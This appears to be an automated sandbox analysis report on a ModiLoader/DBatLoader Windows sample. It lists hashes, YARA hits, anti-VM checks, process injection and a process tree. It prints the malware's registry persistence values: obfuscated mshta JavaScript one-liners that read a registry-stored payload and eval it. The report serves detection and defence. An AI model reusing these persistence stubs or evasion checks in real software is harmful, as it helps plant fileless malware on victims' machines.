Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
02-11-2024 19:36
Static task
static1
Behavioral task
behavioral1
Sample
875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe
Resource
win10v2004-20241007-en
General
-
Target
875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe
-
Size
308KB
-
MD5
875219cca65f986eae6d4f75bd0364d0
-
SHA1
59e15b214e88d989478b47322eea3b0ff85147de
-
SHA256
5c90433cb3e4d5dbac1e1a6a01f241889c5e612d3a8b6e6e82c305ed53873c9d
-
SHA512
ae057b039bd99cdf12b65312d70e6c6ba2f4e26eeff72994dbbf8ddac685635e6ddfc006a85e7f377ed669594896e47a79828b5ae657e8d78d0e276b00c521f5
-
SSDEEP
6144:dR9LNd06fMXt8boSJogRYGkNtbw8Y9MS5Nl1V/sccm0htmU:T9Zd06fMd8VJoOkNjS5NzV0fDmU
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modiloader family
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions dllhost.exe -
ModiLoader Second Stage 46 IoCs
resource yara_rule behavioral2/memory/2036-4-0x000000000DD40000-0x000000000DE04000-memory.dmp modiloader_stage2 behavioral2/memory/2036-2-0x0000000000400000-0x0000000001400000-memory.dmp modiloader_stage2 behavioral2/memory/2036-5-0x000000000DD40000-0x000000000DE04000-memory.dmp modiloader_stage2 behavioral2/memory/2036-3-0x0000000000400000-0x0000000001400000-memory.dmp modiloader_stage2 behavioral2/memory/2036-11-0x000000000DD40000-0x000000000DE04000-memory.dmp modiloader_stage2 behavioral2/memory/2120-12-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/2036-10-0x0000000000400000-0x0000000000436000-memory.dmp modiloader_stage2 behavioral2/memory/2036-9-0x0000000000400000-0x0000000001400000-memory.dmp modiloader_stage2 behavioral2/memory/2120-13-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/4696-18-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/4696-21-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/4696-23-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/4696-22-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/4696-20-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/4696-19-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/4696-24-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/4696-25-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/4696-26-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/4696-27-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/4696-28-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/1728-31-0x0000000000420000-0x00000000004E4000-memory.dmp modiloader_stage2 behavioral2/memory/1728-36-0x0000000000420000-0x00000000004E4000-memory.dmp modiloader_stage2 behavioral2/memory/1728-35-0x0000000000420000-0x00000000004E4000-memory.dmp modiloader_stage2 behavioral2/memory/1728-34-0x0000000000420000-0x00000000004E4000-memory.dmp modiloader_stage2 behavioral2/memory/1728-33-0x0000000000420000-0x00000000004E4000-memory.dmp modiloader_stage2 behavioral2/memory/1728-32-0x0000000000420000-0x00000000004E4000-memory.dmp modiloader_stage2 behavioral2/memory/4696-38-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/4696-41-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/4696-45-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/4696-44-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/4696-43-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/4696-42-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/4696-40-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/4696-39-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/4696-37-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/2756-49-0x0000000000800000-0x00000000008C4000-memory.dmp modiloader_stage2 behavioral2/memory/2756-53-0x0000000000800000-0x00000000008C4000-memory.dmp modiloader_stage2 behavioral2/memory/2756-52-0x0000000000800000-0x00000000008C4000-memory.dmp modiloader_stage2 behavioral2/memory/2756-51-0x0000000000800000-0x00000000008C4000-memory.dmp modiloader_stage2 behavioral2/memory/2756-50-0x0000000000800000-0x00000000008C4000-memory.dmp modiloader_stage2 behavioral2/memory/2756-54-0x0000000000800000-0x00000000008C4000-memory.dmp modiloader_stage2 behavioral2/memory/4696-66-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/4696-67-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/4696-65-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/4696-63-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 behavioral2/memory/4696-64-0x0000000000E00000-0x0000000000EC4000-memory.dmp modiloader_stage2 -
Adds policy Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run dllhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:HB6jlVTy=\"aOHo0hOo\";f8a=new%20ActiveXObject(\"WScript.Shell\");kQsJ1MD=\"KOpthxfvn\";fP42oc=f8a.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\e1c2e7eb\\\\ec8808b3\");mPGTU5J9L=\"0\";eval(fP42oc);IZKasH0P=\"0MGN\";" dllhost.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools dllhost.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dllhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dllhost.exe -
Deletes itself 1 IoCs
pid Process 4696 dllhost.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:rF8phFuK=\"bREOokHyp\";Uo9=new%20ActiveXObject(\"WScript.Shell\");gqMg88hEF=\"pnxNhM\";RrbR90=Uo9.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\e1c2e7eb\\\\ec8808b3\");wI6VUHb4Ya=\"dEquWd1w\";eval(RrbR90);b2IOuEmQQ0=\"ktC0Ed\";" dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:vY5wlJPJz8=\"k0eG2Zsz\";Eh1=new%20ActiveXObject(\"WScript.Shell\");Sl8aYquOL=\"vFoh5FC\";gEz0o=Eh1.RegRead(\"HKCU\\\\software\\\\e1c2e7eb\\\\ec8808b3\");QG7vom3q=\"Shotn\";eval(gEz0o);cC1GMhA7=\"OTp5SxRS\";" dllhost.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum dllhost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2100 set thread context of 2036 2100 875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe 84 -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\explorer.exe = "0" dllhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION dllhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\explorer.exe = "0" dllhost.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION dllhost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\dllhost.exe = "0" dllhost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" dllhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\dllhost.exe = "0" dllhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" dllhost.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl dllhost.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\International dllhost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2100 875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe 2100 875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe -
Suspicious behavior: MapViewOfSection 12 IoCs
pid Process 2036 875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe 2036 875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe 2036 875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe 2120 dllhost.exe 2120 dllhost.exe 2120 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe 4696 dllhost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2100 875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 2100 wrote to memory of 2036 2100 875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe 84 PID 2100 wrote to memory of 2036 2100 875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe 84 PID 2100 wrote to memory of 2036 2100 875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe 84 PID 2100 wrote to memory of 2036 2100 875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe 84 PID 2100 wrote to memory of 2036 2100 875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe 84 PID 2100 wrote to memory of 2036 2100 875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe 84 PID 2100 wrote to memory of 2036 2100 875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe 84 PID 2100 wrote to memory of 2036 2100 875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe 84 PID 2100 wrote to memory of 2036 2100 875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe 84 PID 2100 wrote to memory of 2036 2100 875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe 84 PID 2100 wrote to memory of 2036 2100 875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe 84 PID 2036 wrote to memory of 2120 2036 875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe 85 PID 2036 wrote to memory of 2120 2036 875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe 85 PID 2036 wrote to memory of 2120 2036 875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe 85 PID 2120 wrote to memory of 4696 2120 dllhost.exe 86 PID 2120 wrote to memory of 4696 2120 dllhost.exe 86 PID 2120 wrote to memory of 4696 2120 dllhost.exe 86 PID 4696 wrote to memory of 1728 4696 dllhost.exe 97 PID 4696 wrote to memory of 1728 4696 dllhost.exe 97 PID 4696 wrote to memory of 1728 4696 dllhost.exe 97 PID 4696 wrote to memory of 2756 4696 dllhost.exe 100 PID 4696 wrote to memory of 2756 4696 dllhost.exe 100 PID 4696 wrote to memory of 2756 4696 dllhost.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Users\Admin\AppData\Local\Temp\875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\875219cca65f986eae6d4f75bd0364d0_JaffaCakes118.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\SysWOW64\dllhost.exedllhost.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\SysWOW64\dllhost.exedllhost.exe4⤵
- Looks for VirtualBox Guest Additions in registry
- Adds policy Run key to start application
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Adds Run key to start application
- Maps connected drives based on registry
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4696 -
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\SysWOW64\dllhost.exe"5⤵
- System Location Discovery: System Language Discovery
PID:1728
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe5⤵
- System Location Discovery: System Language Discovery
PID:2756
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2